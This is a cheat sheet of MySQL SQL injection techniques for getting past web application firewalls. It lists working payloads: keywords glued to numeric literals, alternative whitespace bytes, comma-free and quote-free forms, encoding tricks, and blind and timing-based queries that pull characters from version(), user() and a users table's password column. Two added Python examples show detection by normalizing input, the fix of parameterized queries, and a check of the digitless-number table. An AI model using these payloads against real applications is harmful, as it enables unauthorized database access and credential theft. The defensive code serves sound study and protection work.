General SQL injection bypass techniques (using MySQL features)
Appending a keyword directly to a literal
select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0
Generally a WAF checks for word boundaries around keywords such as union when matching, but in these statements there is no word boundary before union, so the check is bypassed.
I found this by fuzzing. My guess is that the parser's lexical analysis reads the floating-point literal, the token ends there, and the following statement is executed directly.
where id=.1union/*.1*/select-.1
where id=.1union/*.1*/select!.1
where id=.1union/*.1*/select~.1
where id=.1union/*.1*/select(1)
where id=.1union/*.1*/select`host`from mysql.user
where id=.1union/*.1*/select'1'
where id=.1union/*.1*/select"1"
where id=.1union/*.1*/select@1
MySQL:
Characters that are commonly filtered and can be replaced: space, the and/or operators, single quotes, the comma ",", double quotes ", and truncation (comment) symbols such as #, --, /*
Space:
select * from(user);
select * from`user`;
'and(true)like(false)union(select(pass)from(users))#
'union [all|distinct] select pass from users#
Bytes MySQL accepts as whitespace:
09 Horizontal Tab
0A New Line
0B Vertical Tab
0C New Page
0D Carriage Return
A0 Non-breaking Space
20 Space
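The two sections above (keywords glued to a numeric literal, and the alternative whitespace bytes) both defeat a rule that looks for the keyword on word boundaries in the raw request. The following Python is an added example written for this page, not code from the original cheat sheet: it normalizes the input the way the MySQL lexer tokenizes it (comments become separators, every accepted whitespace byte becomes a space, and a numeric literal or \N is terminated by the first non-digit) before applying the same keyword rule, and it shows the actual mitigation, a bound parameter, using an in-memory SQLite table with constructed rows as a stand-in for the page's MySQL users table.

```python
import re
import sqlite3

# Whitespace bytes MySQL accepts as token separators (the table on this page).
MYSQL_WHITESPACE = "\x09\x0a\x0b\x0c\x0d\xa0\x20"

# A numeric literal or \N that is not the tail of an identifier:
# abc123union is one identifier, 8E0union is the literal 8E0 followed by a keyword.
LITERAL_BOUNDARY = re.compile(r"(?<![\w$])(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?|\\N")

# The naive rule: the keyword must sit on word boundaries in the raw input.
NAIVE_UNION = re.compile(r"\bunion\b", re.IGNORECASE)


def naive_flags(value):
    """Word-boundary match on the raw input (the check the page says is bypassed)."""
    return bool(NAIVE_UNION.search(value))


def normalize(value):
    """Rewrite the input the way the MySQL lexer would split it into tokens."""
    # /* ... */ comments act as separators, so replace each with a space.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    # Fold every accepted whitespace byte to a plain space.
    value = value.translate({ord(c): " " for c in MYSQL_WHITESPACE})
    # The lexer ends a numeric literal (or \N) at the first non-digit, so put an
    # explicit separator there; this is exactly where the naive rule loses.
    return LITERAL_BOUNDARY.sub(lambda m: m.group(0) + " ", value)


def lexer_aware_flags(value):
    """The same keyword rule, applied after normalization."""
    return bool(NAIVE_UNION.search(normalize(value)))


def parameterized_lookup(user_input):
    """Mitigation: bind the value instead of splicing it into the statement.
    Constructed sample data in an in-memory SQLite table (assumption: a stand-in
    for the page's MySQL users table); the literal-boundary trick has nothing to
    attach to because the whole input is compared as one value."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(8, "alice"), (9, "bob")])
    rows = conn.execute("SELECT id, name FROM users WHERE id = ?", (user_input,)).fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    # Constructed samples: the payload shapes from this page plus benign values.
    for sample in ("8E0union select 1,2,3", "8.0union select 1,2,3",
                   "\\Nunion select 1,2,3", ".1union/*.1*/select-.1",
                   "42", "reunion tickets", "abc123union"):
        print(f"{sample!r:32} naive={naive_flags(sample)!s:5} lexer_aware={lexer_aware_flags(sample)}")
    print(parameterized_lookup("8"), parameterized_lookup("8E0union select 1,2,3"))
```

The normalization is a detection aid, not a substitute for binding: the last function is the one that removes the problem, because the "8E0union ..." string is compared against id as a single value and matches nothing.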
And/or operators:
select * from user where host ='localhost' && 0=0 limit 0,1;
select * from user where host ='localhost' || 1=1 limit 0,1;
Bytes usable as operator separators:
20 Space
2B +
2D -
7E ~
21 !
40 @
Example: SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))
● Prefixes (the unary operators can be chained in any combination): + - ~ !
'Or -- + 2 = --!!! '2
● Operators: ^, =, !=, %, /, *, &, &&, |, ||, <<, >>, <, >=, <=, <>, <=>,
XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, ...
'Or 1
Single quotes:
'- GBK encoding: %df'
'- %2527 UNICODE encoding
Comma:
union select * FROM (SELECT 1) a JOIN (SELECT 2) b JOIN (SELECT 3) c
Why the aliases are needed (duplicate column names are rejected):
mysql> SELECT * FROM (SELECT * FROM user a JOIN user b) c;
ERROR 1060 (42S21): duplicate column name 'host'
mysql> SELECT * FROM (SELECT * FROM user a JOIN user b USING (host)) c;
ERROR 1060 (42S21): duplicate column name 'user'
mysql> SELECT * FROM (SELECT * FROM user a JOIN user b USING (host, user)) c;
ERROR 1060 (42S21): duplicate column name 'Password'
Double quotation marks:
Same as for single quotes
Encoding:
' or 'a' = n'a                      # unicode
' or 'a' = b'1100001                # binary
' or 'a' = x'61                     # hexadecimal
' and substr(data,1,1) = 0x61#      0x6162
' and substr(data,1,1) = unhex(61)# unhex(6162)
' and substr(data,1,1) = char(97)#  char(97,98)
String builder (3)
● Previous functions are well known
● My favorite:
' and substr(data,1,1) = lower(conv(10,10,36))#   'a'
' and substr(data,1,1) = lower(conv(11,10,36))#   'b'
' and substr(data,1,1) = lower(conv(35,10,36))#   'z' (35 is the last base-36 digit; conv(36,10,36) gives '10')
Truncation symbol:
Common: #  --  /*
-- -    SQL comment
%00     Null byte
`       Backtick
Blind injection:
AND MID(VERSION(),1,1) = '5'
AND (SELECT SUBSTR(column_name,1,1) FROM information_schema.columns LIMIT 1) > 'A'
' and substr(data,1,1) = 'a'#
' and substring(data,1,1) = 'a'#
' and mid(data,1,1) = 'a'#
● All three functions work without a comma too:
' and substr(data from 1 for 1) = 'a'#
lpad(data,1,space(1))              // lpad('hi',4,'?') = '??hi'
rpad(data,1,space(1))              // rpad('hi',4,'?') = 'hi??'
left(data,1)
reverse(right(reverse(data),1))
insert(insert(version(),1,0,space(0)),2,222,space(0))
● Subselect:
1'and 0x61=(/*foo*/SELECT mid(pass,1,1) from users limit 1,1)and'1
● Some functions allow searching for substrings:
'-if(locate('f',data),1,0)#
'-if(locate('fo',data),1,0)#
'-if(locate('foo',data),1,0)#
● Some functions allow cutting substrings:
length(trim(leading 'a' FROM data))   # length will be shorter
length(replace(data, 'a', ''))        # length will be shorter
Subselect:
foo'div count(select`pass`from(users)where mid(pass,1,1)rlike lower(conv(10,pi()*pi(),pi()*pi())))-'0
Blind SQL injection example:
select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now())))
Latency:
' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '
Nope:
 0  false, !pi()              10  ceil(pi()*pi())              20  ceil((pi()+pi())*pi())
 1  true, !!pi()              11  ceil(pi()*pi())+true         21  ceil(ceil(pi())*version())
 2  true+true                 12  ceil(pi()+pi()+version())    22  ceil(pi()*ceil(pi()+pi()))
 3  floor(pi())               13  floor(pi()*pi()+pi())        23  ceil((pi()+ceil(pi()))*pi())
 4  ceil(pi())                14  ceil(pi()*pi()+pi())         24  ceil(pi())*ceil(version())
 5  floor(version())          15  ceil(pi()*pi()+version())    25  floor(pi()*(version()+pi()))
 6  ceil(version())           16  floor(pi()*version())        26  floor(version()*version())
 7  ceil(pi()+pi())           17  ceil(pi()*version())         27  ceil(version()*version())
 8  floor(version()+pi())     18  ceil(pi()*version())+true    28  ceil(pi()*pi()*pi()-pi())
 9  floor(pi()*pi())          19  floor((pi()+pi())*pi())      29  floor(pi()*pi()*floor(pi()))
conv([10-36],10,36) turns the same values into letters:
10 A  11 B  12 C  13 D  14 E  15 F  16 G  17 H  18 I  19 J
20 K  21 L  22 M  23 N  24 O  25 P  26 Q  27 R  28 S  29 T
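The table above writes the values 0 to 29 without a single digit, and the conv(...,10,36) column (also used by the string builder earlier on the page) turns them into letters, which is why a rule that keys on numeric literals or quoted strings sees nothing. The Python below is an added example for this page, not the cheat sheet's own code: it evaluates every expression from the table and the base-36 mapping so the values can be checked rather than trusted. It assumes a MySQL 5.1.x server, whose version() string is cast to 5.1 in numeric context (several rows depend on that), and writes MySQL's ! operator as NOT() and true/false as 1/0 because Python has no prefix !.

```python
from math import pi as PI, floor, ceil

# Assumption: MySQL 5.1.x, so version() becomes 5.1 when used as a number.
VERSION = 5.1


def pi():
    return PI


def version():
    return VERSION


def NOT(x):
    # MySQL logical NOT: !x is 1 when x is 0, otherwise 0
    return 1 if x == 0 else 0


# The page's table, value -> MySQL expressions (with ! written as NOT()).
DIGITLESS = {
    0: ["false", "NOT(pi())"],
    1: ["true", "NOT(NOT(pi()))"],
    2: ["true+true"],
    3: ["floor(pi())"],
    4: ["ceil(pi())"],
    5: ["floor(version())"],
    6: ["ceil(version())"],
    7: ["ceil(pi()+pi())"],
    8: ["floor(version()+pi())"],
    9: ["floor(pi()*pi())"],
    10: ["ceil(pi()*pi())"],
    11: ["ceil(pi()*pi())+true"],
    12: ["ceil(pi()+pi()+version())"],
    13: ["floor(pi()*pi()+pi())"],
    14: ["ceil(pi()*pi()+pi())"],
    15: ["ceil(pi()*pi()+version())"],
    16: ["floor(pi()*version())"],
    17: ["ceil(pi()*version())"],
    18: ["ceil(pi()*version())+true"],
    19: ["floor((pi()+pi())*pi())"],
    20: ["ceil((pi()+pi())*pi())"],
    21: ["ceil(ceil(pi())*version())"],
    22: ["ceil(pi()*ceil(pi()+pi()))"],
    23: ["ceil((pi()+ceil(pi()))*pi())"],
    24: ["ceil(pi())*ceil(version())"],
    25: ["floor(pi()*(version()+pi()))"],
    26: ["floor(version()*version())"],
    27: ["ceil(version()*version())"],
    28: ["ceil(pi()*pi()*pi()-pi())"],
    29: ["floor(pi()*pi()*floor(pi()))"],
}

# Only these names are visible to the evaluator; no builtins.
NAMES = {"pi": pi, "version": version, "floor": floor, "ceil": ceil,
         "NOT": NOT, "true": 1, "false": 0}


def evaluate(expr):
    """Evaluate one table expression with the MySQL-like function set above."""
    return eval(expr, {"__builtins__": {}}, NAMES)


def conv36(n):
    """MySQL conv(n,10,36): the number in base 36 with uppercase digits."""
    digits = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    out = ""
    while n:
        n, r = divmod(n, 36)
        out = digits[r] + out
    return out or "0"


def check_table():
    """Rows (value, expression, result) whose expression does not give its value; empty if the table holds."""
    return [(v, e, evaluate(e)) for v, exprs in DIGITLESS.items()
            for e in exprs if evaluate(e) != v]


def letter_table():
    """The conv([10-36],10,36) column: 10..29 -> A..T."""
    return {n: conv36(n) for n in range(10, 30)}


if __name__ == "__main__":
    print("mismatches:", check_table())
    print(letter_table())
```

Changing VERSION to 5.5 makes rows 16, 17, 21 and 26 fail, which is the practical point of the table's version() rows: they are tied to the server build, while the pi()-only rows are not.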